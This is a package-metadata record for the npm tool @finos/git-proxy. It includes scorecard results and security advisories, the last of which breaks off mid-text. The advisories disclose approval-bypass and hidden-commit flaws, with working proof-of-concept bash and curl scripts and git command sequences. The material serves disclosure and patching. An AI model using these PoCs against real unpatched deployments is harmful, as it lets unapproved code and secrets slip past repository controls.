{"id":7862456,"name":"@finos/git-proxy","ecosystem":"npm","description":"Deploy custom push protections and policies on top of Git.","homepage":"https://github.com/finos/git-proxy#readme","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/finos/git-proxy","keywords_array":[],"namespace":"finos","versions_count":50,"first_release_published_at":"2023-06-27T21:45:22.278Z","latest_release_published_at":"2025-07-30T15:20:11.050Z","latest_release_number":"1.19.2","last_synced_at":"2026-04-18T02:11:43.184Z","created_at":"2023-06-28T04:40:09.604Z","updated_at":"2026-04-18T05:12:18.072Z","registry_url":"https://www.npmjs.com/package/@finos/git-proxy","install_command":"npm install @finos/git-proxy","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.19.2","rc":"2.0.0-rc.6"}},"repo_metadata":{"id":38990448,"uuid":"256513079","full_name":"finos/git-proxy","owner":"finos","description":"Deploy custom push protections and policies on top of 
Git","archived":false,"fork":false,"pushed_at":"2026-03-13T10:48:34.000Z","size":20012,"stargazers_count":197,"open_issues_count":104,"forks_count":154,"subscribers_count":10,"default_branch":"main","last_synced_at":"2026-03-13T15:08:24.535Z","etag":null,"topics":["gitops","scans","security"],"latest_commit_sha":null,"homepage":"https://git-proxy.finos.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/finos.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":".github/CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":"NOTICE","maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2020-04-17T13:38:25.000Z","updated_at":"2026-03-12T16:33:05.000Z","dependencies_parsed_at":"2026-02-26T06:03:37.600Z","dependency_job_id":null,"html_url":"https://github.com/finos/git-proxy","commit_stats":null,"previous_names":[],"tags_count":56,"template":false,"template_full_name":null,"purl":"pkg:github/finos/git-proxy","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/finos","download_url":"https://codeload.github.com/finos/git-proxy/tar.gz/refs/heads/main","sbom_url":"https://repo
s.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/sbom","scorecard":{"id":708597,"data":{"date":"2025-08-22T07:26:23Z","repo":{"name":"github.com/finos/git-proxy","commit":"94d807d077834539af09f0f450e7478c5eb3abcd"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.6,"checks":[{"name":"Code-Review","score":6,"reason":"Found 4/6 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 3 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":10,"reason":"GitHub 
workflow tokens follow principle of least privilege","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:41","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/pr-lint.yml:20","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/experimental-inventory-cli-publish.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/experimental-inventory-publish.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/npm.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-lint.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/sample-publish.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/unused-dependencies.yml:5"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action 
workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":8,"reason":"dependency not pinned by hash detected -- score normalized to 8","details":["Warn: npmCommand not pinned by hash: .github/workflows/ci.yml:47","Warn: npmCommand not pinned by hash: .github/workflows/lint.yml:33","Warn: npmCommand not pinned by hash: .github/workflows/sample-publish.yml:28","Info:  27 out of  27 GitHub-owned GitHubAction dependencies pinned","Info:  19 out of  19 third-party GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/experimental-inventory-cli-publish.yml:13"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and 
uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: JavaScriptPropertyBasedTesting integration found: test/processors/blockForAuth.test.js:1","Info: JavaScriptPropertyBasedTesting integration found: test/processors/checkAuthorEmails.test.js:4","Info: JavaScriptPropertyBasedTesting integration found: test/processors/checkCommitMessages.test.js:5","Info: JavaScriptPropertyBasedTesting integration found: test/processors/checkUserPushPermission.test.js:4","Info: JavaScriptPropertyBasedTesting integration found: test/processors/getDiff.test.js:4","Info: JavaScriptPropertyBasedTesting integration found: test/testCheckRepoInAuthList.test.js:6"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: 
LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"CI-Tests","score":10,"reason":"6 out of 6 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 25 contributing companies or organizations","details":["Info: found contributions from: Fl4gSm4sher, InnerSourceCommons, MLH-Fellowship, NixOS, RBC, citi, composr, controlplaneio, director of ciam core platform engineering at barclays, finos, finos @sessiontechnologies, finos-fdx, freelancer, g-research open source software, g-research open-source software, get-kindr, gitlabhq, lugnitdgp, natwest group, openjs-foundation, probr, rbc, sessiontechnologies, sonatype, turntabl"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"26 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-75v8-2h7p-7m2m","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: 
GHSA-f7f6-9jq7-3rqj","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-x7hr-w5r2-h6wg","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-4vvj-4cpr-p986","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-22T07:29:00.840Z","repository_id":38990448,"created_at":"2025-08-22T07:29:00.840Z","updated_at":"2025-08-22T07:29:00.840Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30601208,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-16T23:44:20.790Z","status":"ssl_error","status_checked_at":"2026-03-16T23:44:16.532Z","response_time":96,"last_error":"SSL_read: unexpected eof while 
reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"finos","name":"The Fintech Open Source Foundation (www.finos.org)","uuid":"35377814","kind":"organization","description":"FINOS’ mission is to promote open innovation in financial services. See our full list of repos from our nearly 100 projects \u0026 11 programs at finos.github.io","email":"info@finos.org","website":"https://landscape.finos.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/35377814?v=4","repositories_count":149,"last_synced_at":"2024-04-12T02:16:37.856Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/finos","funding_links":[],"total_stars":12474,"followers":681,"following":0,"created_at":"2022-11-13T03:59:27.742Z","updated_at":"2024-04-12T02:17:10.136Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/finos","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/finos/repositories"},"tags":[]},"repo_metadata_updated_at":"2026-04-18T02:12:49.081Z","dependent_packages_count":0,"downloads":318,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":14.830938223453364,"dependent_repos_count":10.373648108865972,"dependent_packages_count":52.16365939791549,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":25.789415243411607},"purl":"pkg:npm/%40finos/git-proxy","advisories":[{"uuid":"GSA_kwCzR0hTQS12OThnLThycXgtZzkzZ84ABKqQ","url":"https://github.com/advisories/GHSA-v98g-8rqx-g93g","title":"GitProx
y Hidden Commits Injection","description":"### Summary\nAn attacker can inject extra commits into the pack sent to GitHub, commits that aren’t pointed to by any branch. Although these “hidden” commits never show up in the repository’s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High‑impact vulnerability because it completely compromises repository confidentiality.\n\n### Details\n\nThe proxy currently trusts only the ref‑update line (`oldOid → newOid`) and doesn't inspect the packfile’s contents\n\nBecause the code only runs `git rev-list oldOid..newOid` to compute **introducedCommits** but **never** checks which commits actually arrived in the pack, a malicious client can append extra commits. Those “hidden” commits won’t be pointed to by any branch but GitHub still stores and serves them by SHA. \n\u003cimg width=\"2556\" height=\"744\" alt=\"Screenshot 2025-07-16 at 12 29 19\" src=\"https://github.com/user-attachments/assets/abf459a9-310b-4819-a989-797c7e871790\" /\u003e\n\n### PoC\n\n#### Prerequisites\n\n-   A GitHub Personal Access Token stored in `~/.github-test-pat`.\n-   A test repository also registered in git-proxy, e.g. `your-org/test-repo.git`, to which you have push rights.\n\n#### 1. Prepare the “visible” and “hidden” commits\n\n```bash\n# Clone the test repository\ngit clone http://localhost:8000/your-org/test-repo.git\ncd test-repo\n\n# 1. Record the original HEAD\nORIG_COMMIT=$(git rev-parse HEAD)\n\n# 2. Create branch 'foo' and add a visible commit\ngit checkout -b foo\necho \"visible commit\" \u003e\u003e file.txt\ngit add file.txt\ngit commit -m \"Visible commit\"\nVISIBLE_COMMIT=$(git rev-parse HEAD)\n\n# 3. 
Go back to the original commit and create a hidden-branch\ngit checkout $ORIG_COMMIT\ngit checkout -b hidden-branch\necho \"hidden change\" \u003e hidden.txt\ngit add hidden.txt\ngit commit -m \"Hidden commit\"\nHIDDEN_COMMIT=$(git rev-parse HEAD)\n\n# Return to 'foo'\ngit checkout foo\n```\n\n#### 2. Push only the visible commit to branch `foo`\n\n```bash\ngit push --set-upstream origin foo\n# An authorized user approves this push via your normal review workflow\n```\n\n#### 3. Build and push a pack containing the hidden commit\n\nCreate a script named `upload-pack.sh` (replace the placeholder variables with the SHAs you recorded above):\n\n```bash\n#!/usr/bin/env bash\nREMOTE_URL=\"http://localhost:8000/your-org/test-repo.git\"\nREF_NAME=\"refs/heads/foo\"\nORIG_COMMIT=\"\u003c\u003cORIG_COMMIT\u003e\u003e\"\nNEW_COMMIT=\"\u003c\u003cVISIBLE_COMMIT\u003e\u003e\"\nOLD_COMMIT=\"0000000000000000000000000000000000000000\"\nHIDDEN_COMMIT=\"\u003c\u003cHIDDEN_COMMIT\u003e\u003e\"\n\n# 1. List all objects for the visible and hidden commits\ngit rev-list --objects --no-object-names \"^${ORIG_COMMIT}\" ${NEW_COMMIT} \u003e objects.txt\ngit rev-list --objects --no-object-names \"^${ORIG_COMMIT}\" ${HIDDEN_COMMIT} \u003e\u003e objects.txt\n\n# 2. Pack them into a single packfile\ncat objects.txt\ngit pack-objects --stdout \u003c objects.txt \u003e packfile\n\n# 3. Construct the Git smart‑protocol update header\nprintf \"${OLD_COMMIT} ${NEW_COMMIT} ${REF_NAME}\\0 report-status-v2 side-band-64k object-format=sha1 agent=git/2.39.5\" \u003e update_line\nUPDATE_LINE_LEN=\"$(wc -c \u003c update_line)\"\n\nprintf \"%04x\" $((UPDATE_LINE_LEN + 4)) \u003e output\ncat update_line \u003e\u003e output\n\n# Git smart protocol expects a flush packet\nPKT_FLUSH=\"0000\"\nprintf \"%s\" \"${PKT_FLUSH}\" \u003e\u003e output\n\n# Append the packfile\ncat packfile \u003e\u003e output\n\n# 4. 
Send the malicious push via curl\ncurl -u ${USER}:\"$(\u003c~/.github-test-pat)\" \\\n  -X POST \"${REMOTE_URL}/git-receive-pack\" \\\n  -H \"Content-Type: application/x-git-receive-pack-request\" \\\n  -H \"Accept: application/x-git-receive-pack-result\" \\\n  --user-agent \"git/2.42.0\" \\\n  --data-binary @output | cat -v\n```\n\nMake it executable:\n\n```bash\nchmod +x upload-pack.sh\n```\n\nRun it:\n\n```bash\n./upload-pack.sh\n```\n\n#### 4. Verify the hidden commit\n\nOpen in your browser (or via `curl`):\n\n```\nhttps://github.com/your-org/test-repo/commit/\u003c\u003cHIDDEN_COMMIT\u003e\u003e\n```\n\nYou will see the **“Hidden commit”**, even though it is not referenced by any branch.\n\n### Impact\n- **Data Exfiltration (Confidentiality breach):**  \n  Attackers can inject secrets, credentials, or proprietary data into any repository they push to via git-proxy.\n\n- **Undetectable in UI:**  \n  Since the hidden commits never appear in branch graphs, standard code review will not surface them.\n\n- **Persistence Window:**  \n  GitHub retains unreferenced objects for a period long enough to allow automated retrieval before garbage‑collecting 
them.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-30T16:40:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N","references":["https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g","https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110","https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a","https://github.com/finos/git-proxy/releases/tag/v1.19.2","https://nvd.nist.gov/vuln/detail/CVE-2025-54586","https://github.com/advisories/GHSA-v98g-8rqx-g93g"],"source_kind":"github","identifiers":["GHSA-v98g-8rqx-g93g","CVE-2025-54586"],"repository_url":"https://github.com/finos/git-proxy","blast_radius":0.0,"created_at":"2025-07-30T17:08:51.070Z","updated_at":"2026-04-18T05:02:22.181Z","epss_percentage":0.00066,"epss_percentile":0.20497,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OThnLThycXgtZzkzZ84ABKqQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12OThnLThycXgtZzkzZ84ABKqQ","packages":[{"ecosystem":"npm","package_name":"@finos/git-proxy","versions":[{"first_patched_version":"1.19.2","vulnerable_version_range":"\u003c= 1.19.1"}],"purl":"pkg:npm/%40finos%2Fgit-proxy"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OThnLThycXgtZzkzZ84ABKqQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zOXAyLThocTktZndqNs4ABKqO","url":"https://github.com/advisories/GHSA-39p2-8hq9-fwj6","title":"GitProxy New Branch Approval Exploit","description":"### Summary\nAn attacker can exploit the way GitProxy handles new branch creation to bypass the approval of prior commits on the parent branch.\n\nBecause it can greatly affect system integrity, we classify this as a High impact vulnerability.\n\n### Details\nGitProxy checks for the `0000000000000000000000000000000000000000` hash to detect new branches. 
This is used to process the commit accordingly in both `getDiff.ts` and `parsePush.ts`. However, the logic can be exploited as follows:\n\n1. Make a commit in branch `a` (could be `main`)\n2. Make a new branch `b` from that commit\n3. Make a new commit in `b`, then approve it/get it approved\n4. Go back to `a`, and attempt to push this commit to the proxy\n\nThe unapproved commit from `a` will be pushed to the remote.\n\n### PoC\nTo reproduce this vulnerability:\n\n1. Clone the target repository and make an unapproved commit on a mainline branch (e.g. main):\n\n```bash\ngit checkout -b a origin/main\necho \"DEBUG=true\" \u003e config.env\ngit add config.env\ngit commit -m \"Sensitive debug config\"\ngit push proxy a\n```\n\n2. Without approving/getting the commit approved on branch `a`, create a new branch `b` based on it:\n\n```bash\ngit checkout -b b\necho \"feature x implemented\" \u003e feature.txt\ngit add feature.txt\ngit commit -m \"Feature implementation\"\ngit push proxy b\n```\n\n3. Approve/get approval for the push to branch `b`.\n\n4. Now attempt to push the original unapproved commit from branch `a`:\n\n```bash\ngit checkout a\ngit push proxy a\n```\n\nPrior to `1.19.2`, this results in unapproved commits from `a` getting pushed without any policy checks or explicit approval.\n\nFrom `1.19.2` onwards, this flow will allow pushing all commits to branch `b` (and explicit approval will be asked for the changes on `b` only). However, commits on branch `a` now require approval on push. If merging branch `b` into `a`, this also requires explicit approval of the (previously unapproved) commits originating from `a` to prevent loopholes.\n\n### Impact\nThe vulnerability impacts all users or organizations relying on GitProxy to enforce policy and prevent unapproved changes. It requires no elevated privileges beyond regular push access, and no extra user interaction. 
It does, however, require a GitProxy administrator or designated user (`canUserApproveRejectPush`) to approve pushes to the child branch.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-30T16:40:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N","references":["https://github.com/finos/git-proxy/security/advisories/GHSA-39p2-8hq9-fwj6","https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a","https://github.com/finos/git-proxy/commit/f99fe42082eab0970e4cd0acdc3421a527a7e531","https://github.com/finos/git-proxy/releases/tag/v1.19.2","https://nvd.nist.gov/vuln/detail/CVE-2025-54585","https://github.com/advisories/GHSA-39p2-8hq9-fwj6"],"source_kind":"github","identifiers":["GHSA-39p2-8hq9-fwj6","CVE-2025-54585"],"repository_url":"https://github.com/finos/git-proxy","blast_radius":0.0,"created_at":"2025-07-30T17:09:09.422Z","updated_at":"2026-04-18T05:02:22.182Z","epss_percentage":0.00059,"epss_percentile":0.18555,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zOXAyLThocTktZndqNs4ABKqO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zOXAyLThocTktZndqNs4ABKqO","packages":[{"ecosystem":"npm","package_name":"@finos/git-proxy","versions":[{"first_patched_version":"1.19.2","vulnerable_version_range":"\u003c= 1.19.1"}],"purl":"pkg:npm/%40finos%2Fgit-proxy"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zOXAyLThocTktZndqNs4ABKqO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14eG1oLXJmNjMtcXdqds4ABKqP","url":"https://github.com/advisories/GHSA-xxmh-rf63-qwjv","title":"GitProxy Packfile Parsing Exploit","description":"### Summary\nAn attacker can craft a malicious Git packfile to exploit the PACK signature detection in the `parsePush.ts`. 
By embedding a misleading PACK signature within commit content and carefully constructing the packet structure, the attacker can trick the parser into treating invalid or unintended data as the packfile. Potentially, this would allow bypassing approval or hiding commits.\n\n### Details\nThe affected version of `parsePush.ts` attempts to locate the Git PACK file by looking for the last occurrence of the string \"PACK\" in the incoming push payload:\n\n```ts\nconst packStart = buffer.lastIndexOf('PACK');\n```\n\nThis assumes that any \"PACK\" string near the end of the push is the beginning of the actual binary Git packfile. However, Git objects (commits, blobs, etc.) can contain arbitrary content (including the word PACK) in binary or non-compressed blobs.\n\nAn attacker could abuse this by:\n1. Crafting a custom packfile using low-level Git tools or by manually forging one\n2. Placing the string \"PACK\" inside a commit body or a binary file blob that appears after the real PACK start in the stream.\n\nThe parser then ignores the actual push and treats the binary blob/commit body as the PACK file. The actual push contents may violate existing push policies.\n\n### PoC\n\n1. Make a commit on any branch (example: `test-branch`) containing the string \"PACK\"\n2. Manually generate a custom packfile with both branches using `git pack-objects` or a low-level library/custom script:\n  a) Add the string \"PACK\" after the real packfile's PACK header in the binary stream\n3. Push using a custom client/raw protocol injection\n\n### Impact\n\nAttackers with push access can hide commits from scanning/approval and make changes that bypass policies, potentially inserting unwanted/malicious code into a GitProxy protected repository.\n\nThe vulnerability impacts all users or organizations relying on GitProxy to enforce policies and prevent unapproved changes. 
It requires no elevated privileges beyond regular push access, and no extra user interaction; however, it does require a considerable amount of technical skill and intentional effort to accomplish.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-30T16:40:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.0,"cvss_vector":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N","references":["https://github.com/finos/git-proxy/security/advisories/GHSA-xxmh-rf63-qwjv","https://github.com/finos/git-proxy/commit/333c98a165a5a1ec88414db3d4a2c6f81e083e0f","https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a","https://github.com/finos/git-proxy/releases/tag/v1.19.2","https://nvd.nist.gov/vuln/detail/CVE-2025-54584","https://github.com/advisories/GHSA-xxmh-rf63-qwjv"],"source_kind":"github","identifiers":["GHSA-xxmh-rf63-qwjv","CVE-2025-54584"],"repository_url":"https://github.com/finos/git-proxy","blast_radius":0.0,"created_at":"2025-07-30T17:09:06.202Z","updated_at":"2026-04-18T05:02:22.181Z","epss_percentage":0.00066,"epss_percentile":0.20494,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14eG1oLXJmNjMtcXdqds4ABKqP","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14eG1oLXJmNjMtcXdqds4ABKqP","packages":[{"ecosystem":"npm","package_name":"@finos/git-proxy","versions":[{"first_patched_version":"1.19.2","vulnerable_version_range":"\u003c= 1.19.1"}],"purl":"pkg:npm/%40finos%2Fgit-proxy"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14eG1oLXJmNjMtcXdqds4ABKqP/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xcjkzLTh3d2YtMjJnNM4ABKqN","url":"https://github.com/advisories/GHSA-qr93-8wwf-22g4","title":"GitProxy Approval Bypass When Pushing Multiple Branches","description":"### Summary\nThis vulnerability allows a user to push to the remote repository while bypassing policies and explicit approval. 
Since checks and plugins are skipped, code containing secrets or unwanted changes could be pushed into a repository.\n\nBecause it can allow policy violations to go undetected, we classify this as a High impact vulnerability.\n\n### Details\nThe source of the vulnerability is the push parser action `parsePush.ts`. It reads the first branch and parses it, while ignoring subsequent branches (silently letting them go through).\n\nAlthough the fix involves multiple improvements to the commit and push parsing logic, the core solution is to prevent multiple branch pushes from going through in the first place:\n\n```ts\nif (refUpdates.length !== 1) {\n  step.log('Invalid number of branch updates.');\n  step.log(`Expected 1, but got ${refUpdates.length}`);\n  step.setError('Your push has been blocked. Please make sure you are pushing to a single branch.');\n  action.addStep(step);\n  return action;\n}\n```\n\n### PoC\n\n1. Make a commit on a branch:\n\n```bash\ngit checkout -b safe-branch\necho \"Approved code\" \u003e file.txt\ngit add .\ngit commit -m \"Approved code\"\ngit push proxy safe-branch\n```\n\n2. Wait for approval of `safe-branch`.\n\n3. Make a commit on a separate branch with a secret, for example:\n\n```bash\ngit checkout -b bad-branch\necho \"SECRET=abc123\" \u003e .env\ngit add .\ngit commit -m \"Bad code\"\n```\n\n4. Push both at the same time:\n\n`git push proxy safe-branch bad-branch`\n\n#### Expected Result\nIdeally, this would force checks to run for the second branch while sending it out for approval. Meanwhile, the first branch would be pushed to the remote. 
